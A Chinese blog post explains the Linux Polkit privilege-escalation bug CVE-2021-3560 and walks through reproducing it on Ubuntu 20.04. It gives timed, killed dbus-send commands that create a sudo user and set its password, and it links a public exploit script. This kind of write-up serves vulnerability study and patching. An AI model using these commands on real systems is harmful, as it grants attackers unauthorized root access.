CVE-2021-3560 Linux Polkit 权限提升漏洞

素颜马尾好姑娘i 2024-04-01 17:20 82阅读 0赞

#### 文章目录 ####

*  一、Polkit简介
 *  二、Polkit架构
 *  三、漏洞利用过程
 *   *  手工复现
     *  Exp脚本测试
 *  四、结论

--------------------

## 一、Polkit简介 ##

Polkit是默认安装在很多Linux发行版上的系统服务，它由systemd使用，因此任何使用systemd的Linux发行版也使用Polkit。

CVE-2021-3560漏洞存在于系统服务Polkit中，同时因为Polkit被Systemd所调用，因此所有默认安装了systemd的Linux发行版都会使用Polkit。

该漏洞的成因是执行dbus-send命令后在认证完成前强制终止引发错误。而Polkit未正确处理错误而导致允许无特权的用户添加一个sudo用户进行权限提升。

下表展示的是一些流行的Linux发行版以及是否包含此漏洞的情况：  
![在这里插入图片描述][626c7fa43e204b58a2f83e372d5652a1.png]

## 二、Polkit架构 ##

为了帮助解释该漏洞，首先对dbus-send命令执行过程进行说明。

![在这里插入图片描述][562513d43e30469f96f389b1b6ee6f27.png]  
虚线上方的两个进程dbus-send和Authentication Agent是非特权用户进程。线下的那些是特权系统进程。中间是dbus-daemon，它处理所有的通信：其他四个进程通过发送 D-Bus 消息相互通信。下面是通过dbus-send创建新用户的事件顺序：

1、dbus-send要求accounts-daemon创建一个新用户。
    2、accounts-daemon从 接收 D-Bus 消息dbus-send。该消息包括发送者的  唯一总线名称。让我们假设它是:"1.96"。此名称附加到消息中，dbus-daemon不能伪造。
    3、accounts-daemon 询问 polkit 连接：1.96 是否被授权创建新用户。
    4、polkit 要求dbus-daemon提供连接的 UID：1.96。
    5、如果连接 :1.96 的 UID 为 "0"，则 polkit 立即授权该请求。否则，它会向身份验证代理发送允许授权请求的管理员用户列表。
    6、身份验证代理打开一个对话框以从用户那里获取密码。
    7、身份验证代理将密码发送给 polkit。
    8、polkit 将"是"回复发送回accounts-daemon.
    9、accounts-daemon 创建新的用户帐户。

CVE-2021-3560漏洞位于上述事件序列的第四步。如果 polkit 向dbus-daemon请求总线:1.96 的 UID，但总线:1.96 不再存在，会发生什么？dbus-daemon正确处理这种情况并返回错误。但事实上 polkit 没有正确处理该错误，它没有拒绝请求，而是将请求视为来自 UID 0 的进程。换句话说，它立即授权请求。向dbus-demon请求总线UID的函数为polkit\_system\_bus\_name\_get\_creds\_sync。

## 三、漏洞利用过程 ##

### 手工复现 ###

操作系统：`Ubuntu 20.04`  
镜像下载地址：[点击下载][Link 1]

该漏洞非常容易利用，它所需要的是仅使用标准工具，如在终端中的几个命令bash，kill和dbus-send。  
证明漏洞取决于安装的两个软件包：accountsservice和gnome-control-center 在 Ubuntu 桌面等图形系统上，这两个软件包通常默认安装。但是，如果您使用的是非图形 RHEL 服务器之类的东西，那么您可能需要安装它们，如下所示：

sudo yum install accountsservice gnome-control-center

当然，该漏洞与accountsservice或gnome-control-center没有任何特别关系。它们只是 polkit 客户端，恰好是利用的方便载体。PoC 依赖gnome-control-center和accountsservice。

为了避免重复触发身份验证对话框（这可能很烦人），我建议从 SSH 会话运行命令：  
`ssh localhost`  
![在这里插入图片描述][b19f3ae2289e469c85286eb69e9bbce4.png]  
本地测试环境  
![在这里插入图片描述][2276ad40b0ee4a5e9965d766f6493abd.png]  
该漏洞是通过启动dbus-send命令但在 polkit 仍在处理请求的过程中将其杀死而触发的。为了确定杀死dbus-send进程的时间，首先我们要测量dbus-send正常运行的时间：

time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hack string:"hack your host" int32:1

![在这里插入图片描述][63ea6ad9a7054923b7e780c71c953432.png]  
可以看到大约在0.005s，所以就意味着我需要dbus-send在大约0.005s秒前终止命令。

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:hack string:"hack your host" int32:1 & sleep 0.003s ; kill $!

![在这里插入图片描述][74f22ec0e3f74edd804492cd761b1345.png]  
这里可以多重复几次，就是为了可以写入成功！刷新几次之后 输入 id+用户 添加了一个名为hack的sudo用户。

id的值为1004，将下面的payload参数进行修改

dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1004   org.freedesktop.Accounts.User.SetPassword string: 密码位 string:GoldenEye int32:1 & sleep 0.003s ; kill $!

在这之前需要使用openssl passwd -5 qwerasdf! 生成一个SSL密文(-5 指定sha256算法生成散列值)。  
![在这里插入图片描述][40e4bf133e594f11803005ebf40a4d83.png]  
将该密文放在下面这段命令中的密码位里面  
![在这里插入图片描述][310ee1bdc6db425ba367149e716b03c3.png]  
这里要反复刷几次，然后输入 `su - hack`  
![在这里插入图片描述][14d5ea1d7542439c9f604897893853c5.png]  
输入`sudo su ->hack用户密码`  
![在这里插入图片描述][82b4f3774bf045a0ad59563f0efff206.png]  
漏洞利用成功！！！

### Exp脚本测试 ###

下载地址：https://github.com/Almorabea/Polkit-exploit  
![在这里插入图片描述][76d4e4d227d642c4a06be3f179457c5c.png]

## 四、结论 ##

CVE-2021-3560 使无特权的本地攻击者能够获得 root 权限。它非常简单且易于利用，因此应该尽快更新 Linux 。任何安装了 polkit 0.113 版（或更高版本）的系统都容易受到攻击。这包括流行的发行版，例如 RHEL 8 和 Ubuntu 20.04。

[626c7fa43e204b58a2f83e372d5652a1.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/16955e9340a5443eaaa439e748701fdd.png
[562513d43e30469f96f389b1b6ee6f27.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/bab3a55b2ff64dd68c7bcbadab5654ad.png
[Link 1]: https://mirrors.aliyun.com/oldubuntu-releases/releases/20.04/?spm=a2c6h.25603864.0.0.7afa7ff3yLINlX
[b19f3ae2289e469c85286eb69e9bbce4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/2dbdf65bba504267ac23831fbaa59a08.png
[2276ad40b0ee4a5e9965d766f6493abd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/b3ddb3cab78543a584af0a19815c0ef6.png
[63ea6ad9a7054923b7e780c71c953432.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/82dd4f61a9ad426d9727d34a12bee20d.png
[74f22ec0e3f74edd804492cd761b1345.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/2d6a26a9dbc149da9d8b615ce59798de.png
[40e4bf133e594f11803005ebf40a4d83.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/530d5af460b441eb95478644b3b29c05.png
[310ee1bdc6db425ba367149e716b03c3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/4658321038d14c28914fbc0a8f0d1c05.png
[14d5ea1d7542439c9f604897893853c5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/64fbb28dcbf044dabc3b51466efd25ef.png
[82b4f3774bf045a0ad59563f0efff206.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/522b02743bc34946b96777250d3fd613.png
[76d4e4d227d642c4a06be3f179457c5c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/04/01/74247fc7e9914b31af701582e7324ed2.png